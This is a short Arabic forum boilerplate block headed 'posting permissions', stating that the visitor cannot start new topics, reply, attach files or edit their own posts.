أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •